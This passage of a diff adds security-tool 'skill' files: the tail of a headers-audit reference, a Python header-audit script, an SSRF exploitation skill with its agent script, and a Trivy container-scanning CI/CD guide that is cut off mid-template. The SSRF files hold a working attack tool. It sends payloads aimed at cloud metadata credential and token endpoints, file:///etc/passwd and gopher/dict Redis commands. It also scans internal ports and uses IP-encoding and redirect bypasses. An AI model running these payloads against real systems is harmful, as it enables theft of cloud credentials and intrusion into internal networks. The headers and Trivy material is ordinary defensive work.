+| `Permissions-Policy` | `camera=(), microphone=(), geolocation=()` | Restrict browser features |
+
+## Cookie Security Attributes
+
+| Attribute | Description |
+|-----------|-------------|
+| `Secure` | Only send over HTTPS |
+| `HttpOnly` | Not accessible via JavaScript |
+| `SameSite=Strict` | No cross-site cookie sending |
+| `Path=/` | Restrict cookie scope |
+
+## Online Scanners
+
+| Tool | URL | Description |
+|------|-----|-------------|
+| SecurityHeaders.com | https://securityheaders.com/ | Letter-grade assessment |
+| Mozilla Observatory | https://observatory.mozilla.org/ | Comprehensive scoring |
+| CSP Evaluator | https://csp-evaluator.withgoogle.com/ | CSP weakness analysis |
+| Hardenize | https://www.hardenize.com/ | TLS and header monitoring |
+
+## Python Libraries
+
+| Library | Version | Purpose |
+|---------|---------|---------|
+| `requests` | >=2.28 | Fetch HTTP response headers |
+| `re` | stdlib | Parse CSP directives and HSTS values |
+
+## References
+
+- OWASP Secure Headers: https://owasp.org/www-project-secure-headers/
+- MDN Security Headers: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers
+- HSTS Preload: https://hstspreload.org/
+- CSP reference: https://content-security-policy.com/

--- a/security/skills/performing-security-headers-audit/scripts/agent.py
+++ b/security/skills/performing-security-headers-audit/scripts/agent.py
@@ -1,0 +1,276 @@
+#!/usr/bin/env python3
+"""Agent for performing security headers audit.
+
+Analyzes HTTP response headers for HSTS, CSP, X-Frame-Options,
+cookie security attributes, and information disclosure to identify
+missing or misconfigured browser-level protections.
+"""
+
+import requests
+import json
+import sys
+import re
+from datetime import datetime
+
+
+class SecurityHeadersAgent:
+    """Audits HTTP security headers on web applications."""
+
+    def __init__(self, target_url):
+        self.target_url = target_url
+        if not target_url.startswith("http"):
+            self.target_url = f"https://{target_url}"
+        self.session = requests.Session()
+        self.session.verify = True
+
+    def fetch_headers(self, path="/"):
+        """Fetch response headers from a target path."""
+        url = f"{self.target_url.rstrip('/')}{path}"
+        try:
+            resp = self.session.get(url, timeout=10, allow_redirects=True)
+            return {
+                "url": url,
+                "status": resp.status_code,
+                "headers": dict(resp.headers),
+                "cookies": [
+                    {"name": c.name, "value": c.value[:20], "attributes": {
+                        "secure": c.secure, "httponly": "httponly" in c._rest,
+                        "samesite": c._rest.get("SameSite", c._rest.get("samesite", "Not set")),
+                        "path": c.path, "domain": c.domain,
+                    }} for c in resp.cookies
+                ],
+            }
+        except requests.RequestException as e:
+            return {"url": url, "error": str(e)}
+
+    def check_hsts(self, headers):
+        """Check HTTP Strict Transport Security configuration."""
+        hsts = headers.get("Strict-Transport-Security", headers.get("strict-transport-security", ""))
+        finding = {
+            "header": "Strict-Transport-Security",
+            "present": bool(hsts),
+            "value": hsts,
+            "severity": "High" if not hsts else "Info",
+        }
+        if hsts:
+            finding["has_includeSubDomains"] = "includesubdomains" in hsts.lower()
+            finding["has_preload"] = "preload" in hsts.lower()
+            max_age_match = re.search(r"max-age=(\d+)", hsts)
+            if max_age_match:
+                max_age = int(max_age_match.group(1))
+                finding["max_age"] = max_age
+                finding["max_age_sufficient"] = max_age >= 31536000
+                if max_age < 31536000:
+                    finding["severity"] = "Medium"
+                    finding["recommendation"] = "Increase max-age to at least 31536000 (1 year)"
+        else:
+            finding["recommendation"] = "Add: Strict-Transport-Security: max-age=31536000; includeSubDomains; preload"
+        return finding
+
+    def check_csp(self, headers):
+        """Analyze Content Security Policy for weaknesses."""
+        csp = headers.get("Content-Security-Policy", headers.get("content-security-policy", ""))
+        report_only = headers.get("Content-Security-Policy-Report-Only", "")
+
+        finding = {
+            "header": "Content-Security-Policy",
+            "present": bool(csp),
+            "value": csp[:500] if csp else "",
+            "report_only": bool(report_only),
+            "severity": "High" if not csp else "Info",
+            "issues": [],
+        }
+
+        if csp:
+            if "'unsafe-inline'" in csp:
+                finding["issues"].append("unsafe-inline allows inline script execution (XSS risk)")
+                finding["severity"] = "High"
+            if "'unsafe-eval'" in csp:
+                finding["issues"].append("unsafe-eval allows eval() calls (XSS risk)")
+                finding["severity"] = "High"
+            if " * " in f" {csp} " or csp.strip().endswith("*"):
+                finding["issues"].append("Wildcard (*) allows loading from any origin")
+                finding["severity"] = "Medium"
+            if "default-src" not in csp:
+                finding["issues"].append("Missing default-src fallback directive")
+            if report_only and not csp:
+                finding["issues"].append("CSP is report-only, not enforcing")
+                finding["severity"] = "Medium"
+        else:
+            finding["recommendation"] = "Implement Content-Security-Policy with script-src using nonces"
+
+        return finding
+
+    def check_frame_options(self, headers):
+        """Check X-Frame-Options and frame-ancestors."""
+        xfo = headers.get("X-Frame-Options", headers.get("x-frame-options", ""))
+        csp = headers.get("Content-Security-Policy", "")
+        frame_ancestors = ""
+        if "frame-ancestors" in csp:
+            match = re.search(r"frame-ancestors\s+([^;]+)", csp)
+            if match:
+                frame_ancestors = match.group(1).strip()
+
+        finding = {
+            "header": "X-Frame-Options",
+            "present": bool(xfo),
+            "value": xfo,
+            "frame_ancestors": frame_ancestors,
+            "severity": "Medium" if not xfo and not frame_ancestors else "Info",
+        }
+        if not xfo and not frame_ancestors:
+            finding["recommendation"] = "Add X-Frame-Options: DENY or CSP frame-ancestors 'none'"
+        return finding
+
+    def check_content_type_options(self, headers):
+        """Check X-Content-Type-Options."""
+        xcto = headers.get("X-Content-Type-Options", headers.get("x-content-type-options", ""))
+        return {
+            "header": "X-Content-Type-Options",
+            "present": bool(xcto),
+            "value": xcto,
+            "correct": xcto.lower() == "nosniff" if xcto else False,
+            "severity": "Medium" if not xcto else "Info",
+            "recommendation": "Add: X-Content-Type-Options: nosniff" if not xcto else None,
+        }
+
+    def check_referrer_policy(self, headers):
+        """Check Referrer-Policy."""
+        rp = headers.get("Referrer-Policy", headers.get("referrer-policy", ""))
+        return {
+            "header": "Referrer-Policy",
+            "present": bool(rp),
+            "value": rp,
+            "severity": "Medium" if not rp else "Info",
+            "recommendation": "Add: Referrer-Policy: strict-origin-when-cross-origin" if not rp else None,
+        }
+
+    def check_permissions_policy(self, headers):
+        """Check Permissions-Policy."""
+        pp = headers.get("Permissions-Policy", headers.get("permissions-policy", ""))
+        return {
+            "header": "Permissions-Policy",
+            "present": bool(pp),
+            "value": pp[:200] if pp else "",
+            "severity": "Low" if not pp else "Info",
+            "recommendation": "Add: Permissions-Policy: camera=(), microphone=(), geolocation=()" if not pp else None,
+        }
+
+    def check_info_disclosure(self, headers):
+        """Check for information disclosure headers."""
+        findings = []
+        disclosure_headers = ["Server", "X-Powered-By", "X-AspNet-Version", "X-Generator"]
+        for h in disclosure_headers:
+            value = headers.get(h, headers.get(h.lower(), ""))
+            if value:
+                findings.append({
+                    "header": h,
+                    "value": value,
+                    "severity": "Low",
+                    "recommendation": f"Remove or genericize {h} header",
+                })
+        return findings
+
+    def check_cookie_security(self, cookies):
+        """Audit cookie security attributes."""
+        findings = []
+        for cookie in cookies:
+            attrs = cookie.get("attributes", {})
+            issues = []
+            if not attrs.get("secure"):
+                issues.append("Missing Secure flag")
+            if not attrs.get("httponly"):
+                issues.append("Missing HttpOnly flag")
+            samesite = str(attrs.get("samesite", "Not set"))
+            if samesite == "Not set" or samesite == "None":
+                issues.append(f"SameSite={samesite}")
+
+            if issues:
+                findings.append({
+                    "cookie": cookie["name"],
+                    "issues": issues,
+                    "severity": "High" if "Secure" in str(issues) else "Medium",
+                })
+        return findings
+
+    def calculate_grade(self, header_findings):
+        """Calculate a letter grade based on findings."""
+        score = 100
+        for f in header_findings:
+            if not f.get("present", True):
+                sev = f.get("severity", "Info")
+                if sev == "High":
+                    score -= 20
+                elif sev == "Medium":
+                    score -= 10
+                elif sev == "Low":
+                    score -= 5
+            if f.get("issues"):
+                score -= len(f["issues"]) * 5
+
+        if score >= 90:
+            return "A"
+        elif score >= 80:
+            return "B"
+        elif score >= 60:
+            return "C"
+        elif score >= 40:
+            return "D"
+        return "F"
+
+    def run_audit(self, paths=None):
+        """Run complete security headers audit."""
+        if paths is None:
+            paths = ["/"]
+
+        all_findings = []
+        for path in paths:
+            response_data = self.fetch_headers(path)
+            if "error" in response_data:
+                continue
+
+            headers = response_data["headers"]
+            findings = {
+                "path": path,
+                "hsts": self.check_hsts(headers),
+                "csp": self.check_csp(headers),
+                "x_frame_options": self.check_frame_options(headers),
+                "x_content_type_options": self.check_content_type_options(headers),
+                "referrer_policy": self.check_referrer_policy(headers),
+                "permissions_policy": self.check_permissions_policy(headers),
+                "info_disclosure": self.check_info_disclosure(headers),
+                "cookie_security": self.check_cookie_security(response_data.get("cookies", [])),
+            }
+            all_findings.append(findings)
+
+        header_checks = []
+        if all_findings:
+            f = all_findings[0]
+            header_checks = [f["hsts"], f["csp"], f["x_frame_options"],
+                            f["x_content_type_options"], f["referrer_policy"],
+                            f["permissions_policy"]]
+
+        report = {
+            "target": self.target_url,
+            "audit_date": datetime.utcnow().isoformat(),
+            "grade": self.calculate_grade(header_checks),
+            "findings": all_findings,
+        }
+        print(json.dumps(report, indent=2))
+        return report
+
+
+def main():
+    if len(sys.argv) < 2:
+        print("Usage: agent.py <target_url> [path1,path2,...]")
+        sys.exit(1)
+
+    target_url = sys.argv[1]
+    paths = sys.argv[2].split(",") if len(sys.argv) > 2 else ["/"]
+
+    agent = SecurityHeadersAgent(target_url)
+    agent.run_audit(paths)
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/performing-ssrf-vulnerability-exploitation/SKILL.md
+++ b/security/skills/performing-ssrf-vulnerability-exploitation/SKILL.md
@@ -1,0 +1,69 @@
+---
+name: performing-ssrf-vulnerability-exploitation
+description: Test for Server-Side Request Forgery vulnerabilities by probing cloud
+  metadata endpoints, internal network services, and protocol handlers through user-controllable
+  URL parameters. Tests AWS/GCP/Azure metadata APIs (169.254.169.254), internal port
+  scanning via HTTP, URL scheme bypass techniques, and DNS rebinding detection.
+domain: cybersecurity
+subdomain: security-operations
+tags:
+- ssrf
+- web-application-security
+- cloud-metadata-abuse
+- vulnerability-exploitation
+- penetration-testing
+version: '1.0'
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- DE.CM-01
+- RS.MA-01
+- GV.OV-01
+- DE.AE-02
+mitre_attack:
+- T1078
+- T1190
+- T1059
+- T1078.004
+- T1530
+---
+
+
+## When to Use
+
+- When conducting security assessments that involve performing ssrf vulnerability exploitation
+- When following incident response procedures for related security events
+- When performing scheduled security testing or auditing activities
+- When validating security controls through hands-on testing
+
+## Prerequisites
+
+- Familiarity with security operations concepts and tools
+- Access to a test or lab environment for safe execution
+- Python 3.8+ with required dependencies installed
+- Appropriate authorization for any testing activities
+
+## Instructions
+
+1. Install dependencies: `pip install requests`
+2. Identify URL parameters in the target application that accept URLs or hostnames.
+3. Test SSRF payloads:
+   - Cloud metadata: `http://169.254.169.254/latest/meta-data/`
+   - Internal services: `http://127.0.0.1:port/`, `http://10.0.0.1/`
+   - Protocol handlers: `file:///etc/passwd`, `gopher://`, `dict://`
+   - Bypass techniques: IP encoding, DNS rebinding, URL redirects
+4. Analyze responses for information disclosure or internal access confirmation.
+5. Generate a vulnerability assessment report.
+
+```bash
+# For authorized penetration testing and lab environments only
+python scripts/agent.py --target-url https://app.example.com/fetch?url= --output ssrf_report.json
+```
+
+## Examples
+
+### AWS Metadata SSRF
+```
+GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
+```
+If the response contains AWS credentials (AccessKeyId, SecretAccessKey), SSRF is confirmed with critical impact.

--- a/security/skills/performing-ssrf-vulnerability-exploitation/references/api-reference.md
+++ b/security/skills/performing-ssrf-vulnerability-exploitation/references/api-reference.md
@@ -1,0 +1,40 @@
+# API Reference: SSRF Vulnerability Testing
+
+## Cloud Metadata Endpoints
+| Cloud | URL | Headers |
+|-------|-----|---------|
+| AWS IMDSv1 | `http://169.254.169.254/latest/meta-data/` | None |
+| AWS IMDSv2 | `http://169.254.169.254/latest/api/token` | `X-aws-ec2-metadata-token-ttl-seconds: 21600` |
+| GCP | `http://metadata.google.internal/computeMetadata/v1/` | `Metadata-Flavor: Google` |
+| Azure | `http://169.254.169.254/metadata/instance?api-version=2021-02-01` | `Metadata: true` |
+
+## IP Encoding Bypass Techniques
+| Technique | 169.254.169.254 Encoded |
+|-----------|------------------------|
+| Decimal | `2852039166` |
+| Hex | `0xa9fea9fe` |
+| Octal | `0251.0376.0251.0376` |
+| IPv6 mapped | `[::ffff:169.254.169.254]` |
+| Shortened | `169.254.169.254` -> `0` (localhost) |
+
+## Python requests
+```python
+import requests
+resp = requests.get(url, timeout=10, allow_redirects=False, verify=False)
+resp.status_code   # HTTP status
+resp.text          # Response body
+len(resp.content)  # Response size
+resp.headers       # Response headers
+```
+
+## SSRF Impact Levels
+| Access | Impact | Severity |
+|--------|--------|----------|
+| Cloud metadata credentials | Full account compromise | Critical |
+| Internal service access | Lateral movement | High |
+| Local file read (file://) | Information disclosure | High |
+| Internal port scan | Reconnaissance | Medium |
+
+## MITRE ATT&CK
+- T1190 - Exploit Public-Facing Application
+- T1552.005 - Cloud Instance Metadata API

--- a/security/skills/performing-ssrf-vulnerability-exploitation/scripts/agent.py
+++ b/security/skills/performing-ssrf-vulnerability-exploitation/scripts/agent.py
@@ -1,0 +1,174 @@
+#!/usr/bin/env python3
+# For authorized penetration testing and lab environments only
+"""SSRF Vulnerability Testing Agent - Tests for Server-Side Request Forgery via URL parameters."""
+
+import json
+import logging
+import argparse
+from datetime import datetime
+
+import requests
+
+logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s] %(message)s")
+logger = logging.getLogger(__name__)
+
+METADATA_PAYLOADS = [
+    {"name": "AWS IMDSv1 metadata", "url": "http://169.254.169.254/latest/meta-data/", "indicator": "ami-id"},
+    {"name": "AWS IAM credentials", "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/", "indicator": "AccessKeyId"},
+    {"name": "AWS user-data", "url": "http://169.254.169.254/latest/user-data", "indicator": ""},
+    {"name": "GCP metadata", "url": "http://metadata.google.internal/computeMetadata/v1/", "indicator": "attributes"},
+    {"name": "GCP service account token", "url": "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token", "indicator": "access_token"},
+    {"name": "Azure IMDS", "url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01", "indicator": "compute"},
+    {"name": "Azure managed identity", "url": "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/", "indicator": "access_token"},
+]
+
+INTERNAL_SCAN_PORTS = [22, 80, 443, 3306, 5432, 6379, 8080, 8443, 9200, 27017]
+
+BYPASS_PAYLOADS = [
+    {"name": "Decimal IP", "url": "http://2852039166/latest/meta-data/"},
+    {"name": "Hex IP", "url": "http://0xa9fea9fe/latest/meta-data/"},
+    {"name": "Octal IP", "url": "http://0251.0376.0251.0376/latest/meta-data/"},
+    {"name": "IPv6 mapped", "url": "http://[::ffff:169.254.169.254]/latest/meta-data/"},
+    {"name": "Short URL localhost", "url": "http://0/"},
+    {"name": "Redirect bypass", "url": "http://spoofed.burpcollaborator.net/redirect?url=http://169.254.169.254/"},
+    {"name": "DNS rebinding", "url": "http://a]@169.254.169.254/latest/meta-data/"},
+]
+
+
+def test_ssrf_payload(target_url, ssrf_payload, timeout=10):
+    """Send an SSRF payload through the target URL parameter."""
+    test_url = f"{target_url}{ssrf_payload}"
+    try:
+        resp = requests.get(test_url, timeout=timeout, allow_redirects=False, verify=False)
+        return {
+            "status_code": resp.status_code,
+            "response_length": len(resp.content),
+            "response_preview": resp.text[:500],
+            "headers": dict(resp.headers),
+        }
+    except requests.RequestException as e:
+        return {"error": str(e)}
+
+
+def test_metadata_endpoints(target_url):
+    """Test cloud metadata SSRF payloads."""
+    findings = []
+    for payload in METADATA_PAYLOADS:
+        result = test_ssrf_payload(target_url, payload["url"])
+        vulnerable = False
+        if "error" not in result:
+            if result["status_code"] == 200 and result["response_length"] > 10:
+                if payload["indicator"] and payload["indicator"] in result.get("response_preview", ""):
+                    vulnerable = True
+                elif not payload["indicator"] and result["response_length"] > 50:
+                    vulnerable = True
+        findings.append({
+            "test": payload["name"],
+            "payload": payload["url"],
+            "vulnerable": vulnerable,
+            "severity": "critical" if vulnerable else "info",
+            "response_status": result.get("status_code"),
+            "response_length": result.get("response_length", 0),
+        })
+        if vulnerable:
+            logger.warning("SSRF confirmed: %s", payload["name"])
+    return findings
+
+
+def test_internal_port_scan(target_url, internal_ip="127.0.0.1"):
+    """Use SSRF to scan internal ports."""
+    open_ports = []
+    for port in INTERNAL_SCAN_PORTS:
+        payload = f"http://{internal_ip}:{port}/"
+        result = test_ssrf_payload(target_url, payload, timeout=5)
+        if "error" not in result and result["status_code"] != 502:
+            open_ports.append({
+                "ip": internal_ip,
+                "port": port,
+                "status": result["status_code"],
+                "response_length": result["response_length"],
+            })
+            logger.info("Internal port open: %s:%d (status: %d)", internal_ip, port, result["status_code"])
+    return open_ports
+
+
+def test_bypass_techniques(target_url):
+    """Test SSRF filter bypass techniques."""
+    bypass_results = []
+    for payload in BYPASS_PAYLOADS:
+        result = test_ssrf_payload(target_url, payload["url"], timeout=5)
+        success = "error" not in result and result.get("status_code") == 200 and result.get("response_length", 0) > 10
+        bypass_results.append({
+            "technique": payload["name"],
+            "payload": payload["url"],
+            "bypassed": success,
+            "severity": "high" if success else "info",
+        })
+        if success:
+            logger.warning("SSRF bypass succeeded: %s", payload["name"])
+    return bypass_results
+
+
+def test_protocol_handlers(target_url):
+    """Test non-HTTP protocol handlers for SSRF."""
+    protocols = [
+        {"name": "file:// protocol", "url": "file:///etc/passwd", "indicator": "root:"},
+        {"name": "gopher:// protocol", "url": "gopher://127.0.0.1:6379/_INFO", "indicator": "redis"},
+        {"name": "dict:// protocol", "url": "dict://127.0.0.1:6379/INFO", "indicator": "redis"},
+    ]
+    results = []
+    for proto in protocols:
+        result = test_ssrf_payload(target_url, proto["url"], timeout=5)
+        vulnerable = (
+            "error" not in result
+            and result.get("status_code") == 200
+            and proto["indicator"] in result.get("response_preview", "")
+        )
+        results.append({
+            "protocol": proto["name"],
+            "payload": proto["url"],
+            "vulnerable": vulnerable,
+            "severity": "critical" if vulnerable else "info",
+        })
+    return results
+
+
+def generate_report(metadata_findings, port_scan, bypass_results, protocol_results):
+    """Generate SSRF assessment report."""
+    critical = (
+        [f for f in metadata_findings if f["vulnerable"]]
+        + [b for b in bypass_results if b["bypassed"]]
+        + [p for p in protocol_results if p["vulnerable"]]
+    )
+    report = {
+        "timestamp": datetime.utcnow().isoformat(),
+        "metadata_tests": metadata_findings,
+        "internal_port_scan": port_scan,
+        "bypass_techniques": bypass_results,
+        "protocol_handlers": protocol_results,
+        "vulnerabilities_found": len(critical),
+    }
+    print(f"SSRF REPORT: {len(critical)} vulnerabilities found")
+    return report
+
+
+def main():
+    parser = argparse.ArgumentParser(description="SSRF Vulnerability Testing Agent")
+    parser.add_argument("--target-url", required=True, help="Target URL with SSRF parameter (e.g. https://app/fetch?url=)")
+    parser.add_argument("--internal-ip", default="127.0.0.1", help="Internal IP for port scan")
+    parser.add_argument("--output", default="ssrf_report.json")
+    args = parser.parse_args()
+
+    metadata = test_metadata_endpoints(args.target_url)
+    ports = test_internal_port_scan(args.target_url, args.internal_ip)
+    bypasses = test_bypass_techniques(args.target_url)
+    protocols = test_protocol_handlers(args.target_url)
+
+    report = generate_report(metadata, ports, bypasses, protocols)
+    with open(args.output, "w") as f:
+        json.dump(report, f, indent=2)
+    logger.info("Report saved to %s", args.output)
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/scanning-containers-with-trivy-in-cicd/SKILL.md
+++ b/security/skills/scanning-containers-with-trivy-in-cicd/SKILL.md
@@ -1,0 +1,330 @@
+---
+name: scanning-containers-with-trivy-in-cicd
+description: 'This skill covers integrating Aqua Security''s Trivy scanner into CI/CD
+  pipelines for comprehensive container image vulnerability detection. It addresses
+  scanning Docker images for OS package and application dependency CVEs, detecting
+  misconfigurations in Dockerfiles, scanning filesystem and git repositories, and
+  establishing severity-based quality gates that block deployment of vulnerable images.
+
+  '
+domain: cybersecurity
+subdomain: devsecops
+tags:
+- devsecops
+- cicd
+- trivy
+- container-security
+- vulnerability-scanning
+- secure-sdlc
+version: 1.0.0
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- PR.PS-01
+- GV.SC-07
+- ID.IM-04
+- PR.PS-04
+mitre_attack:
+- T1195
+- T1554
+- T1059.004
+- T1610
+- T1611
+---
+
+# Scanning Containers with Trivy in CI/CD
+
+## When to Use
+
+- When building Docker container images in CI/CD and needing automated vulnerability scanning before registry push
+- When establishing quality gates that prevent images with critical or high CVEs from reaching production
+- When compliance requirements mandate vulnerability scanning of all container images before deployment
+- When scanning IaC files (Dockerfiles, Kubernetes manifests) alongside container image scanning
+- When needing a single tool to scan OS packages, language-specific dependencies, and misconfigurations
+
+**Do not use** for runtime container security monitoring (use Falco), for scanning running containers in production (use runtime agents), or when only scanning application source code without containerization (use SAST tools).
+
+## Prerequisites
+
+- Trivy CLI installed (v0.50+) or access to aquasecurity/trivy-action GitHub Action
+- Docker daemon available in CI/CD for building and scanning images
+- Container registry credentials for pulling base images and pushing scanned images
+- Trivy vulnerability database accessible (downloaded automatically or cached)
+
+## Workflow
+
+### Step 1: Configure Trivy Scanning in GitHub Actions
+
+Set up a GitHub Actions workflow that builds a Docker image and scans it with Trivy before pushing to a container registry.
+
+```yaml
+# .github/workflows/container-security.yml
+name: Container Security Scan
+
+on:
+  push:
+    branches: [main]
+  pull_request:
+    branches: [main]
+    paths:
+      - 'Dockerfile'
+      - 'docker-compose*.yml'
+      - 'src/**'
+      - 'requirements*.txt'
+      - 'package*.json'
+
+jobs:
+  build-and-scan:
+    runs-on: ubuntu-latest
+    permissions:
+      security-events: write
+      contents: read
+
+    steps:
+      - uses: actions/checkout@v4
+
+      - name: Build Docker image
+        run: docker build -t app:${{ github.sha }} .
+
+      - name: Run Trivy vulnerability scanner
+        uses: aquasecurity/trivy-action@0.28.0
+        with:
+          image-ref: 'app:${{ github.sha }}'
+          format: 'sarif'
+          output: 'trivy-results.sarif'
+          severity: 'CRITICAL,HIGH'
+          exit-code: '1'
+          ignore-unfixed: true
+
+      - name: Upload Trivy scan results
+        uses: github/codeql-action/upload-sarif@v3
+        if: always()
+        with:
+          sarif_file: 'trivy-results.sarif'
+          category: 'trivy-container'
+
+      - name: Run Trivy misconfiguration scanner
+        uses: aquasecurity/trivy-action@0.28.0
+        with:
+          scan-type: 'config'
+          scan-ref: '.'
+          format: 'table'
+          exit-code: '1'
+          severity: 'CRITICAL,HIGH'
+```
+
+### Step 2: Scan Dockerfiles for Misconfigurations
+
+Trivy detects common Dockerfile security issues such as running as root, using latest tags, and exposing unnecessary ports.
+
+```bash
+# Scan Dockerfile for misconfigurations
+trivy config --severity HIGH,CRITICAL ./Dockerfile
+
+# Scan with custom policy directory
+trivy config --policy ./security-policies --severity MEDIUM,HIGH,CRITICAL .
+
+# Example secure Dockerfile practices Trivy checks for:
+# - USER instruction present (not running as root)
+# - HEALTHCHECK instruction defined
+# - Base image uses specific tag, not :latest
+# - No secrets in ENV or ARG instructions
+# - COPY preferred over ADD
+```
+
+### Step 3: Integrate with GitLab CI/CD
+
+```yaml
+# .gitlab-ci.yml
+stages:
+  - build
+  - scan
+  - push
+
+variables:
+  TRIVY_CACHE_DIR: .trivycache/
+
+build:
+  stage: build
+  script:
+    - docker build -t $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA .
+    - docker save $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA -o image.tar
+  artifacts:
+    paths:
+      - image.tar
+
+trivy-scan:
+  stage: scan
+  image:
+    name: aquasec/trivy:latest
+    entrypoint: [""]
+  cache:
+    paths:
+      - .trivycache/
+  script:
+    - trivy image
+        --input image.tar
+        --exit-code 1
+        --severity CRITICAL,HIGH
+        --ignore-unfixed
+        --format json
+        --output trivy-report.json
+    - trivy image
+        --input image.tar
+        --severity CRITICAL,HIGH,MEDIUM
+        --format table
+  artifacts:
+    reports:
+      container_scanning: trivy-report.json
+    paths:
+      - trivy-report.json
+  allow_failure: false
+
+push:
+  stage: push
+  needs: [trivy-scan]
+  script:
+    - docker load -i image.tar
+    - docker push $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA
+```
+
+### Step 4: Configure Trivy Ignore and Exception Handling
+
+Manage false positives and accepted risks through Trivy's ignore file and VEX statements.
+
+```yaml
+# .trivyignore.yaml
+vulnerabilities:
+  - id: CVE-2023-44487    # HTTP/2 rapid reset - mitigated at load balancer
+    statement: "Mitigated by WAF rate limiting at ingress layer"
+    expires: 2026-06-01
+
+  - id: CVE-2024-21626    # runc container escape - patched in base image update
+    statement: "Tracked in JIRA-SEC-1234, base image update scheduled"
+    expires: 2026-03-15
+
+misconfigurations:
+  - id: DS002             # User not set - required for init containers
+    paths:
+      - "docker/init-container/Dockerfile"
+    statement: "Init container requires root for volume permission setup"
+```
+
+### Step 5: Implement Database Caching and Offline Scanning
+
+Cache the Trivy vulnerability database in CI/CD to reduce scan times and enable air-gapped environments.
+
+```yaml
+# GitHub Actions with database caching
+- name: Cache Trivy DB
+  uses: actions/cache@v4
+  with:
+    path: /tmp/trivy-db
+    key: trivy-db-${{ hashFiles('.github/workflows/container-security.yml') }}
+    restore-keys: trivy-db-
+
+- name: Run Trivy with cached DB
+  uses: aquasecurity/trivy-action@0.28.0
+  with:
+    image-ref: 'app:${{ github.sha }}'
+    cache-dir: /tmp/trivy-db
+    format: 'json'
+    output: 'trivy-results.json'
+    severity: 'CRITICAL,HIGH'
+    exit-code: '1'
+```
+
+```bash
+# Air-gapped: Download DB manually and mount
+trivy image --download-db-only --cache-dir /path/to/cache
+# Transfer cache to air-gapped system
+trivy image --skip-db-update --cache-dir /path/to/cache myimage:tag
+```
+
+### Step 6: Generate SBOM and Scan for License Compliance
+
+Use Trivy to generate Software Bill of Materials alongside vulnerability scanning.
+
+```bash
+# Generate SBOM in CycloneDX format
+trivy image --format cyclonedx --output sbom.cdx.json app:latest
+
+# Generate SBOM in SPDX format
+trivy image --format spdx-json --output sbom.spdx.json app:latest
+
+# Scan SBOM for vulnerabilities (decouple generation from scanning)
+trivy sbom sbom.cdx.json --severity CRITICAL,HIGH
+
+# Scan with license detection
+trivy image --scanners vuln,license --severity HIGH,CRITICAL app:latest
+```
+
+## Key Concepts
+
+| Term | Definition |
+|------|------------|
+| CVE | Common Vulnerabilities and Exposures — standardized identifiers for publicly known security vulnerabilities |
+| Vulnerability DB | Trivy's regularly updated database aggregating CVE data from NVD, vendor advisories, and language-specific sources |
+| Misconfiguration | Security-relevant configuration issue in Dockerfiles, Kubernetes manifests, or IaC templates |
+| SBOM | Software Bill of Materials — complete inventory of all components and dependencies in a container image |
+| Ignore Unfixed | Flag to skip CVEs without available patches, reducing noise from vulnerabilities with no actionable fix |
+| VEX | Vulnerability Exploitability eXchange — machine-readable statements about whether a vulnerability is exploitable in context |
+| Exit Code | Non-zero return code from Trivy when findings exceed the severity threshold, used to fail CI/CD pipelines |
+
+## Tools & Systems
+
+- **Trivy**: Open-source vulnerability scanner by Aqua Security supporting images, filesystems, repos, and IaC
+- **trivy-action**: Official GitHub Action for running Trivy scans in GitHub Actions workflows
+- **Trivy Operator**: Kubernetes operator that continuously scans cluster workloads with Trivy
+- **Grype**: Alternative image scanner by Anchore for comparison and validation of scan results
+- **Harbor**: Container registry with built-in Trivy integration for automatic image scanning on push
+
+## Common Scenarios
+
+### Scenario: Multi-Stage Build with Separate Scan and Push
+
+**Context**: A team builds multi-stage Docker images and needs to scan the final production image before pushing to ECR, while also scanning the build stage for supply chain risks.
+
+**Approach**:
+1. Build the Docker image with `--target production` for the final stage
+2. Run Trivy with `--severity CRITICAL,HIGH --exit-code 1 --ignore-unfixed` to block on exploitable issues
+3. Generate an SBOM in CycloneDX format and store as a build artifact
+4. Upload SARIF results to GitHub Security tab for visibility
+5. Only push to ECR if the Trivy scan exits with code 0
+6. Tag the pushed image with the scan timestamp and Trivy DB version for audit traceability
+
+**Pitfalls**: Scanning only the final stage misses vulnerable packages that were present in build stages and may have influenced the build. Run `trivy fs` on the build context separately. Caching the Trivy DB too aggressively (weekly) means newly published CVEs take days to appear in scans.
+
+## Output Format
+
+```
+Trivy Container Scan Report
+=============================
+Image: app:a1b2c3d4
+Base Image: python:3.12-slim-bookworm
+Scan Date: 2026-02-23
+DB Version: 2026-02-23T00:15:00Z
+
+VULNERABILITY SUMMARY:
+  Total: 47
+  Critical: 2
+  High: 5
+  Medium: 18
+  Low: 22
+  Unfixed: 8 (excluded from gate)
+
+CRITICAL FINDINGS:
+  CVE-2025-12345  libssl3    3.0.11-1  3.0.13-1  OpenSSL buffer overflow
+  CVE-2025-67890  curl       7.88.1-10 7.88.1-12 curl HSTS bypass
+
+HIGH FINDINGS:
+  CVE-2025-11111  zlib1g     1.2.13    1.2.13.1  zlib heap buffer overflow
+  CVE-2025-22222  python3.12 3.12.1    3.12.3    CPython path traversal
+  CVE-2025-33333  requests   2.31.0    2.32.0    requests SSRF in redirects
+
+MISCONFIGURATION:
+  DS002  [HIGH]   Dockerfile: USER instruction not set (running as root)
+  DS026  [MEDIUM] Dockerfile: No HEALTHCHECK defined
+
+QUALITY GATE: FAILED (2 Critical, 5 High findings)
+```

--- a/security/skills/scanning-containers-with-trivy-in-cicd/assets/template.md
+++ b/security/skills/scanning-containers-with-trivy-in-cicd/assets/template.md
@@ -1,0 +1,195 @@
+# Trivy Container Scanning Templates
+
+## GitHub Actions: Full Container Security Pipeline
+
+```yaml
+# .github/workflows/container-security.yml
+name: Container Security
+
+on:
+  push:
+    branches: [main]
+  pull_request:
+    paths: ['Dockerfile', 'docker-compose*.yml', 'src/**']
+
+env:
+  REGISTRY: ghcr.io
+  IMAGE_NAME: ${{ github.repository }}
+
+jobs:
